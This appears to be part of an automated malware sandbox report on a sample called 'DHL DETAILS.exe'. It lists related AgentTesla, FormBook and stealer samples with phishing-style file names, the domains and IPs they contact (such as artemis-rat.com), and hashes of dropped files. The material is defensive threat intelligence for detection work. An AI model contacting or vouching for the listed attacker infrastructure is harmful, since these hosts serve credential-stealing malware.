                                    SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exeGet hashmaliciousAgentTeslaBrowse
                                      PO #1131011152-2024-Order,pdf.exeGet hashmaliciousAgentTeslaBrowse
                                        SecuriteInfo.com.Win64.ExploitX-gen.17969.12173.exeGet hashmaliciousAgentTeslaBrowse
                                          FEDEX & INVOICE.Tracking Details.exeGet hashmaliciousAgentTeslaBrowse
                                            212.110.188.202DHL EXPRESS.exeGet hashmaliciousAgentTeslaBrowse
                                            • artemis-rat.comartemis-rat.com:443
                                            Customer's Requirements and Pricing Details.exeGet hashmaliciousAgentTeslaBrowse
                                            • artemis-rat.comartemis-rat.com:443
                                            HtfOQz42tN.exeGet hashmaliciousUnknownBrowse
                                            • heygirlisheeverythingyouwantedinaman.comheygirlisheeverythingyouwantedinaman.com:443
                                            3011574829.exeGet hashmaliciousUnknownBrowse
                                            • artemis-rat.comartemis-rat.com:443
                                            75C8OqdJUQ.exeGet hashmaliciousUnknownBrowse
                                            • heygirlisheeverythingyouwantedinaman.comheygirlisheeverythingyouwantedinaman.com:443
                                            Urgent Quotation required .exeGet hashmaliciousAgentTeslaBrowse
                                            • heygirlisheeverythingyouwantedinaman.comheygirlisheeverythingyouwantedinaman.com:443
                                            Quote 00123.pdf.exeGet hashmaliciousAgentTeslaBrowse
                                            • heygirlisheeverythingyouwantedinaman.comheygirlisheeverythingyouwantedinaman.com:443
                                            SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exeGet hashmaliciousAgentTeslaBrowse
                                            • heygirlisheeverythingyouwantedinaman.comheygirlisheeverythingyouwantedinaman.com:443
                                            n1KVzXM8Wk.exeGet hashmaliciousAgentTeslaBrowse
                                            • heygirlisheeverythingyouwantedinaman.comheygirlisheeverythingyouwantedinaman.com:443
                                            24.230.33.96hesaphareketi-01.pdf.exeGet hashmaliciousVector StealerBrowse
                                              hesaphareketi-01.pdf.exeGet hashmaliciousUnknownBrowse
                                                DHL shipment arrival.exeGet hashmaliciousAgentTeslaBrowse
                                                  Document 9404658918890577081119475750-pdf.exeGet hashmaliciousAgentTeslaBrowse
                                                    DHL EXPRESS.exeGet hashmaliciousAgentTeslaBrowse
                                                      Customer's Requirements and Pricing Details.exeGet hashmaliciousAgentTeslaBrowse
                                                        HES34ED23ED.exeGet hashmaliciousUnknownBrowse
                                                          https://waltondev2.com/c.phpGet hashmaliciousPhisherBrowse
                                                            TrkLU8M8Ai.exeGet hashmaliciousUnknownBrowse
                                                              5mTce7e08R.exeGet hashmaliciousUnknownBrowse
                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                ktxcomay.com.vnhesaphareketi-01.pdf.exeGet hashmaliciousVector StealerBrowse
                                                                • 222.255.238.159
                                                                hesaphareketi-01.pdf.exeGet hashmaliciousUnknownBrowse
                                                                • 222.255.238.159
                                                                DHL shipment arrival.exeGet hashmaliciousAgentTeslaBrowse
                                                                • 222.255.238.159
                                                                Document 9404658918890577081119475750-pdf.exeGet hashmaliciousAgentTeslaBrowse
                                                                • 222.255.238.159
                                                                DHL EXPRESS.exeGet hashmaliciousAgentTeslaBrowse
                                                                • 222.255.238.159
                                                                Customer's Requirements and Pricing Details.exeGet hashmaliciousAgentTeslaBrowse
                                                                • 222.255.238.159
                                                                https://waltondev2.com/c.phpGet hashmaliciousPhisherBrowse
                                                                • 222.255.238.159
                                                                TrkLU8M8Ai.exeGet hashmaliciousUnknownBrowse
                                                                • 222.255.238.159
                                                                5mTce7e08R.exeGet hashmaliciousUnknownBrowse
                                                                • 222.255.238.159
                                                                HtfOQz42tN.exeGet hashmaliciousUnknownBrowse
                                                                • 222.255.238.159
                                                                uu-wrong-check-537652193.us-east-1.elb.amazonaws.comcJVeMuYr6y.exeGet hashmaliciousUnknownBrowse
                                                                • 54.156.246.194
                                                                FEDEX & INVOICE.Tracking Details.exeGet hashmaliciousAgentTeslaBrowse
                                                                • 54.156.246.194
                                                                artemis-rat.comhesaphareketi-01.pdf.exeGet hashmaliciousVector StealerBrowse
                                                                • 172.67.140.87
                                                                hesaphareketi-01.pdf.exeGet hashmaliciousUnknownBrowse
                                                                • 172.67.140.87
                                                                DHL shipment arrival.exeGet hashmaliciousAgentTeslaBrowse
                                                                • 172.67.140.87
                                                                Document 9404658918890577081119475750-pdf.exeGet hashmaliciousAgentTeslaBrowse
                                                                • 104.21.54.158
                                                                DHL EXPRESS.exeGet hashmaliciousAgentTeslaBrowse
                                                                • 172.67.140.87
                                                                Customer's Requirements and Pricing Details.exeGet hashmaliciousAgentTeslaBrowse
                                                                • 172.67.140.87
                                                                3011574829.exeGet hashmaliciousUnknownBrowse
                                                                • 172.67.140.87
                                                                3011574829.exeGet hashmaliciousUnknownBrowse
                                                                • 172.67.140.87
                                                                github.comQuote Q110534.jsGet hashmaliciousSTRRATBrowse
                                                                • 140.82.114.4
                                                                SecuriteInfo.com.Trojan.GenericKD.68336658.9759.9322.exeGet hashmaliciousUnknownBrowse
                                                                • 140.82.114.3
                                                                SecuriteInfo.com.Trojan.GenericKD.68336658.9759.9322.exeGet hashmaliciousUnknownBrowse
                                                                • 140.82.113.4
                                                                hesaphareketi-01.pdf.exeGet hashmaliciousVector StealerBrowse
                                                                • 140.82.112.3
                                                                hesaphareketi-01.pdf.exeGet hashmaliciousUnknownBrowse
                                                                • 140.82.114.3
                                                                DHL shipment arrival.exeGet hashmaliciousAgentTeslaBrowse
                                                                • 140.82.112.3
                                                                Document 9404658918890577081119475750-pdf.exeGet hashmaliciousAgentTeslaBrowse
                                                                • 140.82.112.4
                                                                DHL EXPRESS.exeGet hashmaliciousAgentTeslaBrowse
                                                                • 140.82.112.3
                                                                Customer's Requirements and Pricing Details.exeGet hashmaliciousAgentTeslaBrowse
                                                                • 140.82.112.3
                                                                https://waltondev2.com/c.phpGet hashmaliciousPhisherBrowse
                                                                • 192.30.255.112
                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                BYTEMARK-ASGBhesaphareketi-01.pdf.exeGet hashmaliciousVector StealerBrowse
                                                                • 212.110.188.207
                                                                hesaphareketi-01.pdf.exeGet hashmaliciousUnknownBrowse
                                                                • 212.110.188.207
                                                                DHL shipment arrival.exeGet hashmaliciousAgentTeslaBrowse
                                                                • 212.110.188.207
                                                                Document 9404658918890577081119475750-pdf.exeGet hashmaliciousAgentTeslaBrowse
                                                                • 212.110.188.207
                                                                DHL EXPRESS.exeGet hashmaliciousAgentTeslaBrowse
                                                                • 212.110.188.207
                                                                Customer's Requirements and Pricing Details.exeGet hashmaliciousAgentTeslaBrowse
                                                                • 212.110.188.207
                                                                HES34ED23ED.exeGet hashmaliciousUnknownBrowse
                                                                • 212.110.188.207
                                                                https://waltondev2.com/c.phpGet hashmaliciousPhisherBrowse
                                                                • 212.110.188.207
                                                                TrkLU8M8Ai.exeGet hashmaliciousUnknownBrowse
                                                                • 212.110.188.207
                                                                5mTce7e08R.exeGet hashmaliciousUnknownBrowse
                                                                • 212.110.188.207
                                                                OVDC-ASUAhttps://waltondev2.com/c.phpGet hashmaliciousPhisherBrowse
                                                                • 93.171.243.253
                                                                SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exeGet hashmaliciousAgentTeslaBrowse
                                                                • 93.171.243.253
                                                                PO #1131011152-2024-Order,pdf.exeGet hashmaliciousAgentTeslaBrowse
                                                                • 93.171.243.253
                                                                SecuriteInfo.com.Win64.ExploitX-gen.17969.12173.exeGet hashmaliciousAgentTeslaBrowse
                                                                • 93.171.243.253
                                                                FEDEX & INVOICE.Tracking Details.exeGet hashmaliciousAgentTeslaBrowse
                                                                • 93.171.243.253
                                                                CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdCYolk.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                • 8.217.154.16
                                                                rproformainvoice.exeGet hashmaliciousFormBookBrowse
                                                                • 8.217.154.16
                                                                Purchase Order.exeGet hashmaliciousFormBookBrowse
                                                                • 8.217.154.16
                                                                Open_Document.PDF.jsGet hashmaliciousMatanbuchusBrowse
                                                                • 47.243.255.33
                                                                Americanistic57.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                • 8.217.154.16
                                                                Respecialist.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                • 8.217.154.16
                                                                Altometer.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                • 8.217.154.16
                                                                Lamps.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                • 8.217.154.16
                                                                QUOTE.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                • 8.217.154.16
                                                                https://waltondev2.com/c.phpGet hashmaliciousPhisherBrowse
                                                                • 147.139.212.172
                                                                MIDCO-NETUSV5dx1XzpND.elfGet hashmaliciousUnknownBrowse
                                                                • 184.83.55.89
                                                                hesaphareketi-01.pdf.exeGet hashmaliciousVector StealerBrowse
                                                                • 24.230.33.96
                                                                hesaphareketi-01.pdf.exeGet hashmaliciousUnknownBrowse
                                                                • 24.230.33.96
                                                                DHL shipment arrival.exeGet hashmaliciousAgentTeslaBrowse
                                                                • 24.230.33.96
                                                                Document 9404658918890577081119475750-pdf.exeGet hashmaliciousAgentTeslaBrowse
                                                                • 24.230.33.96
                                                                DHL EXPRESS.exeGet hashmaliciousAgentTeslaBrowse
                                                                • 24.230.33.96
                                                                Customer's Requirements and Pricing Details.exeGet hashmaliciousAgentTeslaBrowse
                                                                • 24.230.33.96
                                                                HES34ED23ED.exeGet hashmaliciousUnknownBrowse
                                                                • 24.230.33.96
                                                                https://waltondev2.com/c.phpGet hashmaliciousPhisherBrowse
                                                                • 24.230.33.96
                                                                TrkLU8M8Ai.exeGet hashmaliciousUnknownBrowse
                                                                • 24.230.33.96
                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                3b5074b1b5d032e5620f69f9f700ff0eOOCL OOLU2146153420 0703244654.jsGet hashmaliciousRemcosBrowse
                                                                • 172.67.140.87
                                                                • 140.82.114.3
                                                                • 140.82.113.3
                                                                • 102.223.20.217
                                                                • 222.255.238.159
                                                                WHW6mWPjVa.exeGet hashmaliciousAgentTeslaBrowse
                                                                • 172.67.140.87
                                                                • 140.82.114.3
                                                                • 140.82.113.3
                                                                • 102.223.20.217
                                                                • 222.255.238.159
                                                                EHV24HNVTw.exeGet hashmaliciousAgentTeslaBrowse
                                                                • 172.67.140.87
                                                                • 140.82.114.3
                                                                • 140.82.113.3
                                                                • 102.223.20.217
                                                                • 222.255.238.159
                                                                SecuriteInfo.com.Trojan.Siggen21.10427.8927.13410.exeGet hashmaliciousUnknownBrowse
                                                                • 172.67.140.87
                                                                • 140.82.114.3
                                                                • 140.82.113.3
                                                                • 102.223.20.217
                                                                • 222.255.238.159
                                                                SecuriteInfo.com.Trojan.Siggen21.10427.8927.13410.exeGet hashmaliciousUnknownBrowse
                                                                • 172.67.140.87
                                                                • 140.82.114.3
                                                                • 140.82.113.3
                                                                • 102.223.20.217
                                                                • 222.255.238.159
                                                                https://ofxymp69pmne68.azureedge.net/002/?fbclid=IwAR1cpmaoeFBk2PfZnL2MIPTSSBVlM1OamDRLbxCamm1x0HMj3riwwPyxxGc#Get hashmaliciousTechSupportScamBrowse
                                                                • 172.67.140.87
                                                                • 140.82.114.3
                                                                • 140.82.113.3
                                                                • 102.223.20.217
                                                                • 222.255.238.159
                                                                FW Attention New Incoming D0CS for Live-quinn on.emlGet hashmaliciousHTMLPhisherBrowse
                                                                • 172.67.140.87
                                                                • 140.82.114.3
                                                                • 140.82.113.3
                                                                • 102.223.20.217
                                                                • 222.255.238.159
                                                                SecuriteInfo.com.Win32.PWSX-gen.10639.26376.exeGet hashmaliciousAgentTeslaBrowse
                                                                • 172.67.140.87
                                                                • 140.82.114.3
                                                                • 140.82.113.3
                                                                • 102.223.20.217
                                                                • 222.255.238.159
                                                                whitelist.pdf.lnkGet hashmaliciousUnknownBrowse
                                                                • 172.67.140.87
                                                                • 140.82.114.3
                                                                • 140.82.113.3
                                                                • 102.223.20.217
                                                                • 222.255.238.159
                                                                z78IAwHKt4YPAME736.exeGet hashmaliciousAgentTeslaBrowse
                                                                • 172.67.140.87
                                                                • 140.82.114.3
                                                                • 140.82.113.3
                                                                • 102.223.20.217
                                                                • 222.255.238.159
                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                C:\Users\user\AppData\Roaming\VHFSQv\VHFSQv.exepayment.exeGet hashmaliciousAgentTeslaBrowse
                                                                  New Order 7003153933.exeGet hashmaliciousAgentTeslaBrowse
                                                                    SecuriteInfo.com.Win32.TrojanX-gen.10939.30166.exeGet hashmaliciousAgentTeslaBrowse
                                                                      Purchase Order.exeGet hashmaliciousAgentTeslaBrowse
                                                                        CHEMICAL SPECIFICATION.exeGet hashmaliciousAgentTeslaBrowse
                                                                          Quotation.pdf.exeGet hashmaliciousAgentTeslaBrowse
                                                                            file.exeGet hashmaliciousAgentTeslaBrowse
                                                                              file.exeGet hashmaliciousAgentTeslaBrowse
                                                                                QUOTATION#00913-1HNMR FORMONONETIN LIST.exeGet hashmaliciousAgentTeslaBrowse
                                                                                  FAC- IST9G4VW.exeGet hashmaliciousAgentTeslaBrowse
                                                                                    Process:C:\Windows\System32\svchost.exe
                                                                                    File Type:Extensible storage engine DataBase, version 0x620, checksum 0xe79025bf, page size 16384, DirtyShutdown, Windows version 10.0
                                                                                    Category:dropped
                                                                                    Size (bytes):1310720
                                                                                    Entropy (8bit):0.6585789190439364
                                                                                    Encrypted:false
                                                                                    SSDEEP:1536:UXESB2ESB2SSjlK/rv5rO1T1B0CZSJRYkr3g16P92UPkLk+kAwI/0uzn10M1Dn/T:Baza9v5hYe92UOHDnAPZ4PZf9h/9h
                                                                                    MD5:6E32A0CDD6B767D83B674F469958370F
                                                                                    SHA1:23DE78CF4FB2CCC607AB1FE1E4CB09F270468A77
                                                                                    SHA-256:555B2A95DC9A7D0F4413252DD9E720CDCEFC26EED1510A17B92C0700A5DCAED1
                                                                                    SHA-512:A267E62F90C3EC28F1DBF70C0DD8C045C2DDC4DBC6469759B7F055341AC7818C0E5BE2A0D2FD6A5E1BC0E36E6C89474BB267F6A16BDF677F9834D34D88AFC2A3
                                                                                    Malicious:false
                                                                                    Preview:.%.... ...............X\...;...{......................0.z..........{.......|..h.|.........................D./..;...{..........................................................................................................eJ......n....@...................................................................................................... ........-...{5..............................................................................................................................................................................................2...{..........................................|5..................I%......|...........................#......h.|.....................................................................................................................................................................................................................................................................................................................................................
                                                                                    Process:C:\Windows\System32\WerFault.exe
                                                                                    File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):65536
                                                                                    Entropy (8bit):1.497218151918031
                                                                                    Encrypted:false
                                                                                    SSDEEP:192:XME1DwD0x88bscaK5eFlJsfZFDBPotkdzuiF0Z24lO8DO:cE1Dwwx88bHaCUsPotczuiF0Y4lO8D
                                                                                    MD5:92A8344C52A1B3694D071C35DE558843
                                                                                    SHA1:028941A047FB6D616CBA96C5FF9E8E84C5DB5309
                                                                                    SHA-256:AFC30C807857DC92E89CF9E2FA2ED8919347721B340B8E2E3935223A35FD998E
                                                                                    SHA-512:3716FEE1394F54A41E90215133D0F13BBD07D20B6DE295E963BCB39A1F89DD73B516B97252E38630CAF8CD721F473EC650493F4D7F4231A6E6E43E15B01CDF16
                                                                                    Malicious:false
                                                                                    Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.5.4.4.6.0.1.3.7.2.1.9.0.5.9.0.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.5.4.4.6.0.1.8.0.3.9.0.9.2.2.0.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.0.f.9.7.c.8.0.e.-.3.a.0.b.-.4.d.f.9.-.b.0.1.4.-.5.3.e.c.6.4.c.b.0.5.d.6.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.3.f.0.4.6.d.2.d.-.7.d.f.8.-.4.e.4.6.-.8.9.6.4.-.b.a.6.8.3.a.3.d.0.0.0.0.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....N.s.A.p.p.N.a.m.e.=.s.v.c.h.o.s.t...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.A.s.s.a.l.a.m.A.l.a.i.k.u.m...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.a.8.4.8.-.0.0.0.1.-.0.0.1.4.-.a.f.3.7.-.6.6.5.d.1.b.7.2.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.9.e.b.a.1.c.a.4.c.f.8.9.a.1.0.4.e.4.e.d.4.1.8.3.e.f.9.b.0.9.9.5.0.0.0.0.0.0.0.0.!.0.0.0.0.9.e.3.a.8.d.6.6.b.1.a.7.8.8.b.2.6.2.f.0.4.7.f.c.0.e.1.3.8.3.0.2.9.2.9.1.1.d.5.b.!.s.v.c.h.o.s.t.
                                                                                    Process:C:\Windows\System32\WerFault.exe
                                                                                    File Type:Mini DuMP crash report, 16 streams, Sat Mar 9 12:15:55 2024, 0x1205a4 type
                                                                                    Category:dropped
                                                                                    Size (bytes):13197949
                                                                                    Entropy (8bit):2.1722204370579408
                                                                                    Encrypted:false
                                                                                    SSDEEP:24576:NFI2wdq/eRACtL8f3DGhYlWfd24JbqwzjTqAIlnvZQUd:uq2RAE2DGCed2abpOll
                                                                                    MD5:E882D5E22373103458C5F0D4E24E2308
                                                                                    SHA1:7E8125A63B520FCF0038A01C2D7915C4B8CDA6FB
                                                                                    SHA-256:BBE869C6B04CA58A7441B48130729A5132C01D3B53B3562AA3466037782982E1
                                                                                    SHA-512:94C9D131172E5865EDE45CA61AF240491394D86EA0F4FCD0CD4CFB098D22B1698F0EACCCE09840C0F2640D08C2930FC4201B4FFF9F080E75DEB425F79D77BD94
                                                                                    Malicious:false
                                                                                    Preview:MDMP..a..... ........R.e.............p...............w......<...........|4..............7..........l.......8...........T............`..............\...........H...............................................................................eJ..............Lw......................T.......H....R.e............................. ..................W... .E.u.r.o.p.e. .S.t.a.n.d.a.r.d. .T.i.m.e.......................................W... .E.u.r.o.p.e. .S.u.m.m.e.r. .T.i.m.e...........................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...........................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                    Process:C:\Windows\System32\WerFault.exe
                                                                                    File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):9130
                                                                                    Entropy (8bit):3.711101132698766
                                                                                    Encrypted:false
                                                                                    SSDEEP:192:R6l7wVeJ47/56YEI8DSvbgmfL4JPprM89batpnfBY1m:R6lXJkB6YEzSgmfL41IpfL
                                                                                    MD5:B87246A847158784BFA7AA17C787E773
                                                                                    SHA1:6AA205C3F8E0A5F787CEEFE3EFEF0C314F32F7B9
                                                                                    SHA-256:8C0CE72B2FC15A2B1D5E2DEA754A220EB5B957BF6CC109B92BA9B0CB87342EC9
                                                                                    SHA-512:8557E155F01FC42A714CF275165153F1F07CF798E5345DA64CBEBAB44367BADC2B091583D09CE93B22AB24BFA10330ACBAF61927B31C704A4F934DA564FA2F0D
                                                                                    Malicious:false
                                                                                    Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.4.3.0.8.0.<./.P.
                                                                                    Process:C:\Windows\System32\WerFault.exe
                                                                                    File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):4748
                                                                                    Entropy (8bit):4.494674416001735
                                                                                    Encrypted:false
                                                                                    SSDEEP:48:cvIwWl8zsqJg771I9wjkkWpW8VYMYm8M4JCyetFNyq85KnZokdImhYd:uIjf4I7bi7VQJCDro0fhYd
                                                                                    MD5:E4EE33B366C542E5D48F148CC7A0203D
                                                                                    SHA1:0EA454C15919F0DC511A30C27953F1AE1A4C1912
                                                                                    SHA-256:82B4C220D2449D553FA0129C6E9148FD39CCBD6D7E775D4D789DB62C013B93B9
                                                                                    SHA-512:21751CB570B7653841FBBF6DBCCE61329F1880E32064A3F150AE99B26764843621314776778D1426F8C28528A4660F75B0AB79721D35C796D3F948CA42EA15C1
                                                                                    Malicious:false
                                                                                    Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="227719" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                                                    Process:C:\Windows\System32\svchost.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):84624
                                                                                    Entropy (8bit):3.098289870943429
                                                                                    Encrypted:false
                                                                                    SSDEEP:768:P/t3Jn998iLggqgeGIO79OSMCoXZcohoDp57cSvsx+GjJ+SsKyxeB:XlJsiLNqu79OSSXioup54SvY+MQiB
                                                                                    MD5:23F3161E447775E9E89ADAF1245D3874
                                                                                    SHA1:E985D2B4A66153B93A6BA52925997F4A26D9255F
                                                                                    SHA-256:290280179098BB151E83E039F8A2930B047AF3FE75BEF79ECFE443D61AE94A19
                                                                                    SHA-512:B911891AAF0750843017C53DE231BAF8D03F97ED3E550088CA15ADA3065B3FE997363F97FB9C01AD216563EF47F04C19DA8F3D0189299B9DD8AB85A02BF86255
                                                                                    Malicious:false
                                                                                    Preview:I.m.a.g.e.N.a.m.e.,.U.n.i.q.u.e.P.r.o.c.e.s.s.I.d.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.,.W.o.r.k.i.n.g.S.e.t.P.r.i.v.a.t.e.S.i.z.e.,.H.a.r.d.F.a.u.l.t.C.o.u.n.t.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.H.i.g.h.W.a.t.e.r.m.a.r.k.,.C.y.c.l.e.T.i.m.e.,.C.r.e.a.t.e.T.i.m.e.,.U.s.e.r.T.i.m.e.,.K.e.r.n.e.l.T.i.m.e.,.B.a.s.e.P.r.i.o.r.i.t.y.,.P.e.a.k.V.i.r.t.u.a.l.S.i.z.e.,.V.i.r.t.u.a.l.S.i.z.e.,.P.a.g.e.F.a.u.l.t.C.o.u.n.t.,.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.P.e.a.k.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.Q.u.o.t.a.P.e.a.k.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.e.a.k.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.e.a.k.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.r.i.v.a.t.e.P.a.g.e.C.o.u.n.t.,.R.e.a.d.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.W.r.i.t.e.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.O.t.h.e.r.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.R.e.a.d.T.r.a.n.s.f.e.r.C.o.u.n.t.,.W.r.i.t.e.T.r.a.n.s.f.e.r.C.o.u.n.t.,.O.t.h.e.r.T.r.a.n.s.f.e.r.C.o.u.n.t.,.H.a.n.
                                                                                    Process:C:\Windows\System32\svchost.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):13340
                                                                                    Entropy (8bit):2.6950717450712136
                                                                                    Encrypted:false
                                                                                    SSDEEP:96:TiZYWqe0ERfYYIYssZmHMYEZR7Jt8in3RHCwXzua/R8McfxKzIHZ4:2ZD7WPS9Sa/R8McfxHHZ4
                                                                                    MD5:4F5E29E3A2BBCC8F2D55A417EC21B833
                                                                                    SHA1:6ACFBF6EFCEC79593DD25C6735B52A386D3F8CD6
                                                                                    SHA-256:A20CF0272A9C5A9D5B02560479D0FEEDBA1B73A7F1FA105D9055890CB5BCBE41
                                                                                    SHA-512:8D21A21B0B544BA24EFED31E7A69D0FAFDFFCE546EDFCD209A5445C8F39C01D59402E16F038D3AE402243D2638A96F6B9378F54887419F1854F6EA7DBF4B0D3F
                                                                                    Malicious:false
                                                                                    Preview:B...T.i.m.e.r.R.e.s.o.l.u.t.i.o.n. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.5.6.2.5.0.....B...P.a.g.e.S.i.z.e. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .4.0.9.6.....B...N.u.m.b.e.r.O.f.P.h.y.s.i.c.a.l.P.a.g.e.s. . . . . . . . . . . . . . . . . . . . . . . . . . .1.0.4.8.3.3.3.....B...L.o.w.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . . . . . . . . .2.....B...H.i.g.h.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . .1.3.1.0.7.1.9.....B...A.l.l.o.c.a.t.i.o.n.G.r.a.n.u.l.a.r.i.t.y. . . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.i.n.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.a.x.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . .1.4.0.7.3.7.4.8.8.2.8.9.7.9.1.....B...A.c.t.i.v.e.P.r.o.c.e.s.s.o.r.s.A.f.f.i.n.i.t.y.M.a.s.k. . . . . . .
                                                                                    Process:C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    File Type:Microsoft Cabinet archive data, Windows 2000/XP setup, 69211 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
                                                                                    Category:dropped
                                                                                    Size (bytes):69211
                                                                                    Entropy (8bit):7.995787876711886
                                                                                    Encrypted:true
                                                                                    SSDEEP:1536:4vHkVfDISE//aDY0WAXTF+0daIpyFQaqPZkatNjgkFOE4/JZZWnEn6:4vHKfMSeKFXdBcmnXkksE40E6
                                                                                    MD5:753DF6889FD7410A2E9FE333DA83A429
                                                                                    SHA1:3C425F16E8267186061DD48AC1C77C122962456E
                                                                                    SHA-256:B42DC237E44CBC9A43400E7D3F9CBD406DBDEFD62BFE87328F8663897D69DF78
                                                                                    SHA-512:9D56F79410AD0CF852C74C3EF9454E7AE86E80BDD6FF67773994B48CCAC71142BCF5C90635DA6A056E1406E81E64674DB9584928E867C55B77B59E2851CF6444
                                                                                    Malicious:false
